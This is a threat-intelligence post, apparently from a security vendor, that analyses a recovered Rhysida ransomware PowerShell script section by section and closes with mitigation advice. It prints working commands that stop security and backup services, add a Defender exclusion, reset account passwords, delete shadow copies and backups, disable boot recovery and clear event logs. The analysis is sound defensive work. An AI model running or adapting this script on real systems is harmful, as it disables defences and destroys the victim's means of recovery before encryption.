Rhysida: Evading Detection, One Service at a Time

During a recent engagement, At-Bay Security analysts observed artifacts showing a threat actor operating under the Rhysida ransomware brand attempting to hide their network activity prior to ransomware deployment.

Based on these observations, actionable steps organizations can take to protect themselves include:

• Educate users on how to identify social engineering tactics such as search engine optimization (SEO) Poisoning which may falsely elevate malicious URLs in search engine results.
• Detections built around the disabling of, or tampering with security controls and services, including changes or modifications to security settings (e.g. Windows Defender).
• Enforce Multi-Factor Authentication for all remote connections.
• Leverage a managed version of Endpoint Detection and Response (EDR) so that alerts are identified and actioned in real-time.

About Rhysida Ransomware

Rhysida Ransomware, first detected in May 2023, has impacted hundreds of victim networks across the globe, with a particular focus on sectors such as healthcare, government, education and manufacturing.

This group operates on a double extortion model, exfiltrating data and encrypting networks prior to asking for a financial demand. Rhysida is also known to use a variety of methods to infiltrate systems including the exploitation of external remote services (e.g. VPNs) and phishing.

Key Findings

In a case observed by At-Bay, a user at an organization fell victim to a tactic known as Search Engine Optimization (SEO) poisoning and downloaded a trojanized version of Putty.exe which helped Rhysida gain access and persistence into the network. Once inside, the actor moved laterally through the network using Remote Desktop Protocol (RDP). During the threat actor’s time in the system, forensics identified the use of the tool Advanced Port Scanner for network enumeration and exfiltration via azcopy commands, successfully transferring over a hundred thousand files into a threat actor-controlled Azure storage. After exfiltration, but prior to ransomware deployment, the threat actor was observed clearing security logs across numerous systems, the details of which will be discussed in the next sections. 

Rhysida Evasion Techniques

At-Bay Security reviewed access to a client environment after encryption with Rhysida ransomware (.rhysida). Investigation identified that the threat actor was diligent in clearing logs and other techniques to hide their tactics, techniques and procedures. However, investigators identified that a script meant to clear logs during the intrusion failed to complete the process, giving At-Bay analysts visibility into how the script worked.

This article will break down each section of this code to reveal insights into threat actor obfuscation.

In the Beginning

The discovered script starts with the declaration of variables which can and will likely be changed per environment.

Here we start with the threat actor hard-coding an SMB IP address, which can be a share that already exists or that the threat actor sets prior to the execution. They also define a password later used to reset the ‘Administrator’ account, as well as change the text shown to a user prior to logging in.

$SHARE_IP = "[PrivateIPREDACTED]";
$SHARE_DISK = "in";
$LOCAL_ADMIN_PASS = "[REDACTED]";
$LOGIN_TITLE_TEXT = "Welcome";
$LOGIN_TEXT = "Welcome aboard";
  

Evasion

Services

In the next section of the script, the threat actor coded the name of services potentially running on a host that could hamper their exfiltration or encryption efforts.

The Function ‘s’ defines a list of services names and if they are present on the host it will attempt to set these services to disabled and stop them. Most services will attempt to auto restart if they crash or are closed, this is what the disabling part of the script is trying to address. After the services have been set to be disabled, they then attempt to stop those processes.

function s( $s ) {,
Get-Service | Where-Object { $_.DisplayName -like \""*$s*\"" } | Set-Service -StartupType Disabled -ErrorAction SilentlyContinue;,
Get-Service | Where-Object { $_.DisplayName -like \""*$s*\"" } | Stop-Service -Force -ErrorAction SilentlyContinue;,
};,
s( \""SQL\"" );,
s( \""Oracle\"" );,
s( \""Exchange\"" );,
s( \""Veeam\"" );,
s( \""Malwarebytes\"" );,
s( \""Sharepoint\"" );,
s( \""Quest\"" );,
s( \""Backup\"" );,
s( \""HvHost\"" );,
s( \""vmickvpexchange\"" );,
s( \""vmicguestinterface\"" );,
s( \""vmicshutdown\"" );,
s( \""vmicheartbeat\"" );,
s( \""vmcompute\"" );,
s( \""vmicvmsession\"" );,
s( \""vmicrdv\"" );,
s( \""vmictimesync\"" );,
s( \""vmms\"" );,
s( \""vmicvss\"" );,
  

Processes

The next step attempts to identify and stop already running processes. This list targets both base server applications as well as AV processes, Backup processes, Remote Management processes, ERP Applications and Administration tooling. Using Windows Management Instrumentation Command-Line (WMIC) the TA will look for running processes with specific names and terminate the process using the “delete” function. Following that the threat actor uses powershell to terminate specific processes if they are currently running.

After the threat actor shuts down these services and processes they move on to active changes within the system.

function p( $p ) {,
wmic process where \""name like '%$p%'\"" delete;,
};,
p( \""Agent\"" );,
p( \""Malware\"" );,
p( \""Endpoint\"" );,
p( \""sql\"" );,
p( \""SQL\"" );,
p( \""Veeam\"" );,
p( \""Core.Service\"" );,
p( \""Mongo\"" );,
p( \""Backup\"" );,
p( \""QuickBooks\"" );,
p( \""QBDB\"" );,
p( \""QBData\"" );,
p( \""QBCF\"" );,
p( \""Kaspersky\"" );,
p( \""server\"" );,
p( \""sage\"" );,
p( \""http\"" );,
p( \""apache\"" );,
p( \""web\"" );,
p( \""vnc\"" );,
p( \""teamviewer\"" );,
p( \""OCS Inventory\"" );,
p( \""monitor\"" );,
p( \""security\"" );,
p( \""def\"" );,
p( \""dev\"" );,
p( \""office\"" );,
p( \""anydesk\"" );,
p( \""protect\"" );,
p( \""secure\"" );,
p( \""segurda\"" );,
p( \""center\"" );,
p( \""agent\"" );,
p( \""silverlight\"" );,
p( \""exchange\"" );,
p( \""manage\"" );,
p( \""acronis\"" );,
p( \""endpoint\"" );,
p( \""autodesk\"" );,
p( \""database\"" );,
p( \""adobe\"" );,
p( \""java\"" );,
p( \""logmein\"" );,
p( \""microsoft\"" );,
p( \""solarwinds\"" );,
p( \""engine\"" );,
p( \""AlwaysOn\"" );,
p( \""Framework\"" );,
p( \""sprout\"" );,
p( \""firefox\"" );,
p( \""chrome\"" );,
p( \""barracuda\"" );,
p( \""veeam\"" );,
p( \""arcserve\"" );,
foreach ( $p in @( \""agntsvc.exe\"",
\""agntsvc.exeagntsvc.exe\"",
\""agntsvc.exeencsvc.exe\"",
\""agntsvc.exe\"",
\""isqlplussvc.exe\"",
\""anvir.exe\"",
\""anvir64.exe\"",
\""apache.exe\"",
\""backup.exe\"",
\""ccleaner.exe\"",
\""ccleaner64.exe\"",
\""dbeng50.exe\"",
\""dbsnmp.exe\"",
\""encsvc.exe\"",
\""far.exe\"",
\""firefoxconfig.exe\"",
\""infopath.exe\"",
\""isqlplussvc.exe\"",
\""kingdee.exe\"",
\""msaccess.exe\"",
\""msftesql.exe\"",
\""mspub.exe\"",
\""mydesktopqos.exe\"",
\""mydesktopservice.exe\"",
\""mysqld-nt.exe\"",
\""mysqld-opt.exe\"",
\""mysqld.exe\"",
\""ncsvc.exe\"",
\""ocautoupds.exe\"",
\""ocomm.exe\"",
\""ocssd.exe\"",
\""oracle.exe\"",
\""oracle.exe\"",
\""procexp.exe\"",
\""regedit.exe\"",
\""sqbcoreservice.exe\"",
\""sql.exe\"",
\""sqlagent.exe\"",
\""sqlbrowser.exe\"",
\""sqlserver.exe\"",
\""sqlservr.exe\"",
\""sqlwriter.exe\"",
\""synctime.exe\"",
\""tbirdconfig.exe\"",
\""tomcat.exe\"",
\""tomcat6.exe\"",
\""u8.exe\"",
\""ufida.exe\"",
\""visio.exe\"",
\""xfssvccon.exe\"" ) ) {,
Stop-Process -Name $p -Force -ErrorAction SilentlyContinue;,
};,
  

Configuration Changes

In the next section of code, the threat actor sets an exception in Windows Defender to allow execution of any .exe file. After that the threat actor sets the extension ‘.Readme’ to be a text file which will aid in the compromised user being able to easily open any file with a ‘.Readme’ extension such as the ransom note. The last part of this section copies the computer name from the environment variable to a variable named ‘$name’, to be used later in the script.

Add-MpPreference -ExclusionExtension \"".exe\"" -ErrorAction SilentlyContinue;,
cmd.exe /c assoc .README=txtfile;,
$name = $env:computername;,
  

Wakey-Wakey Eggs and Bakey

The threat actor uses the ARP table of the computer to compile a list of MAC addresses the computer knows about and crafts a Wake-On-Lan magic packet to those systems in an attempt to bring any of those systems that might have been offline back online, aiding in lateral movement inside an organization.

MAC = arp -a $address | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | ForEach-Object -Process {,
# conver MAC address to hex string,
$MacByteArray = $_ -split \""[:-]\"" | ForEach-Object { [Byte] \""0x$_\"" };,
# create WOL packet,
[Byte[]] $MagicPacket = ( ,
0xFF * 6 ) + ( $MacByteArray * 16 );,
# send WOL packet on broadcast address,
$UdpClient = New-Object System.Net.Sockets.UdpClient;,
$UdpClient.Connect( ( [System.Net.IPAddress]::Broadcast ),
7 );,
$UdpClient.Send( $MagicPacket,
$MagicPacket.Length );,
$UdpClient.Close();,
};,
  

Enable Remote Access

The threat actor enables RDP within the windows registry and within the windows firewall enables any rule associated with the ‘Remote Desktop’ group.

Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server'-Name \""fDenyTSConnections\"" -Value 0 -ErrorAction SilentlyContinue;,
Enable-NetFirewallRule -DisplayGroup \""Remote Desktop\"" -ErrorAction SilentlyContinue;,
  

Local Account Modification

Here in this section, the threat actor gathers a list of all local accounts on a windows system. With this list of users it builds new passwords for the accounts, which is the first 13 characters of a MD5 hash. The hash is created by combining the username with the word ‘zero’.

$localusers = Get-WmiObject -Class Win32_UserAccount -ComputerName $env:COMPUTERNAME -Filter LocalAccount='true' | select -ExpandProperty name;,
function Get-StringHash( [String] $String,
$HashName = \""MD5\"" ) {,
$StringBuilder = New-Object System.Text.StringBuilder;,
[System.Security.Cryptography.HashAlgorithm]::Create( $HashName ).ComputeHash( [System.Text.Encoding]::UTF8.GetBytes( $String ) ) | %{,
[Void]$StringBuilder.Append( $_.ToString( \""x2\"" ) );,
};,
$StringBuilder.ToString();,
};,
foreach ( $user in $localusers ) {,
$myUser = \""$($user)zero\"";,
$hash = Get-StringHash $myUser;,
$pass = $hash.substring( 0,
13 );,
( [adsi]\""WinNT://$env:COMPUTERNAME/$user\"" ).SetPassword( \""$pass\"" );,
};,
  

Elevation

Here in this section the local built-in ‘Administrator’ has its password set to the password set at the beginning of the script named ‘$LOCAL_ADMIN_PASS’. It will then make sure the local ‘Administrator’ account is part of the local security group ‘Administrators’ ensuring the account has administrative privileges on the host. The threat actor also adds the same account to the local ‘Remote Desktop Users’ security group, in combination with the previous edits to the remote desktop setting the threat actor should now have remote access to this host using the local ‘Administrator’ account.

net user Administrator $LOCAL_ADMIN_PASS;,
net localgroup \""Administrators\"" Administrator /add;,
net localgroup \""Remote Desktop Users\"" Administrator /add;,
  

No Way Back

In this section of the script, the threat actor takes steps to inhibit restoration of this host after the encryption event. The threat actor removes any Windows backups, or any shadow copies and restore points which might exist on the system.

wbadmin stop job;,
wbadmin delete catalog -quiet;,
wbadmin delete systemstatebackup;,
wbadmin delete systemstatebackup -keepversions:0;,
wbadmin delete backup;,
wmic shadowcopy delete;,
vssadmin delete shadows /all /quiet;,
Get-ComputerRestorePoint | Delete-ComputerRestorePoint;,
  

Here the threat actor attempts to remove the feature ‘Windows Defender’ from the host.

dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet;,
  

Evade, Evade, Evade

Next, the function ‘Uninstall-App’ attempts to remove protections on installed applications and perform an uninstall by either utilizing msiexec or cmd.exe.

function Uninstall-App( $_name ) {,
foreach( $obj in Get-ChildItem \""HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"" ) {,
$dname = $obj.GetValue( \""DisplayName\"" );,
if ( $dname -like \""*$_name*\"" ) {,
$uninstString = $obj.GetValue( \""UninstallString\"" );,
$found = $null;,
foreach ( $line in $uninstString ) {,
reg add \""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\$dname\"" /v \""NoModify\"" /t REG_DWORD /d \""0\"" /f;,
reg add \""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\$dname\"" /v \""NOREPAIR\"" /t REG_DWORD /d \""0\"" /f;,
reg add \""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\$dname\"" /v \""NOREMOVE\"" /t REG_DWORD /d \""0\"" /f;,
$found = $line -match '(\\{.+\\}).*';,
};,
If ( $found -ne $null ) {,
$appid = $matches[ 1 ];,
Write-Output $appid;,
start-process \""msiexec.exe\"" -arg \""/X $appid /qn /norestart\"" -Wait;,
} else {,
start-process \""cmd.exe\"" -arg \""/c $line /silent\"";,
};,
};,
};,
};,
$uapps = @( \""Bitdefender\"" );,
foreach( $uapp in $uapps ) {,
Uninstall-App $uapp;,
};,
  

Blocking Restoration

This part of the script changes the boot policies for a Windows host and turns off recovery options if the host has issues during boot. This poses a hindrance to any restoration options presented to the user at boot time. Next, the script enables Windows remote management and turns on the ability to execute Powershell commands on this host from a remote system.

bcdedit /set {default} bootstatuspolicy ignoreallfailures;,
bcdedit /set {default} recoveryenabled no;,
winrm quickconfig -quiet -force 2>$null;,
Enable-PSRemoting 2>$null;,
  

Check-in and Welcome Message

The script will then check to see if Windows Defender is still present. If the process is running, a text file named the computer name will be written to the share identified in variables at the beginning of the script and write ‘NO’ conversely if Windows Defender is not currently running it does the same but writes ‘OK’ to the text file. Next the script will modify the text displayed to an end user prior to logging on to the computer, with the content of the variables set at the beginning of the script.

$LOGIN_TITLE_TEXT = \""Welcome\"";,
$LOGIN_TEXT = \""Welcome aboard\"";,
if( $( GET-Service -Name WinDefend ).Status -eq \""Running\"" ) {,
New-Item -Path \""\\\\$SHARE_IP\\$SHARE_DISK\"" -Name \""$name.txt\"" -ItemType \""file\"" -Value \""NO\"" -ErrorAction SilentlyContinue;,
} else {,
New-Item -Path \""\\\\$SHARE_IP\\$SHARE_DISK\"" -Name \""$name.txt\"" -ItemType \""file\"" -Value \""OK\"" -ErrorAction SilentlyContinue;,
},
reg add \""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\"" /v \""legalnoticecaption\"" /t REG_SZ /d $LOGIN_TITLE_TEXT /f;,
reg add \""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\"" /v \""legalnoticecaption\"" /t REG_SZ /d $LOGIN_TEXT /f;,
  

Stealth Check

Now, the script clears all files located in C:\Windows\Temp. Next for every user profile on the system it will remove any files in the per user temp directory. After removing these temporary files, the script then will clear Event Logs for the Security, Application and System events. It will remove any Powershell commands which might be present in the Powershell Console History log. Inserted here amongst the evidence tampering techniques is another removal instruction for uninstalling Trend-Micro. It then clears the Powershell window and removes the history typed within.

Remove-Item -Path $env:TEMP\\* -Recurse -force -ErrorAction SilentlyContinue;,
Get-ChildItem C:\\Users | select \""Name\"" | ForEach-Object {,
Remove-Item -Path C:\\Users\\$( $_.Name )\\AppData\\Local\\Temp\\* -Recurse -force -ErrorAction SilentlyContinue;,
};,
wevtutil el | ForEach { wevtutil cl \""$_\"" };,
wevtutil cl Security;,
wevtutil cl Application;,
wevtutil cl System;,
Remove-Item (Get-PSReadlineOption).HistorySavePath;,
& Set-ItemProperty -Path HKLM:\\SOFTWARE\\Wow6432Node\\TrendMicro\\PC-cillinNTCorp\\CurrentVersion\\Misc. -Name \""Allow Uninstall\"" -Value 1 -ErrorAction SilentlyContinue,
& \""C:\\Program Files (x86)\\Trend Micro\\OfficeScan Client\\ntrmv.exe\"" ,
clear;,
Clear-History;,
  

File List, Achieved

The last of the recovered script we have here enumerates the file paths for all drives, providing the threat actor with insight into the data contained across the network.

if ( $PATH -eq $null ) {,
$drives = GetDrives;,
ForEach( $drive in $drives ) {,
Walk( $drive.Root );,
},
} else {,
Walk( $PATH );,
},`"
  

Conclusion & Mitigation Tactics

This article highlights the lengths ransomware groups such as Rhysida will go to to hide their tracks while in a network. It is vital for organizations to use multi-layered security controls to prevent threat actors from accessing the network and to detect and eject them should one make it past first-line defenses.

Practical suggestions to prevent ransomware attacks such as Rhysida include:

1. Enforce Multi-Factor Authentication for remote services such as Virtual Private Networks (VPN) or Remote Desktop Protocol (RDP).
2. Maintain a regular schedule for patching to ensure critical systems are running the latest versions of commercial software.
3. Educate and inform users on how to identify suspicious emails or web search results prompting them to download software. Software should only be obtained from the official company domain.
4. Utilize Managed Detection and Response service to help identify and stop threat actor activity.

At-Bay policyholders have access to meetings with Cyber Advisors through the Stance Advisory Services in their policy. At-Bay’s expert Cyber Advisors can assist with advanced assessments, security training, and provide personalized recommendations for your organization. At-Bay also offers 24×7 monitoring and remediation through Stance Managed Detection and Response services.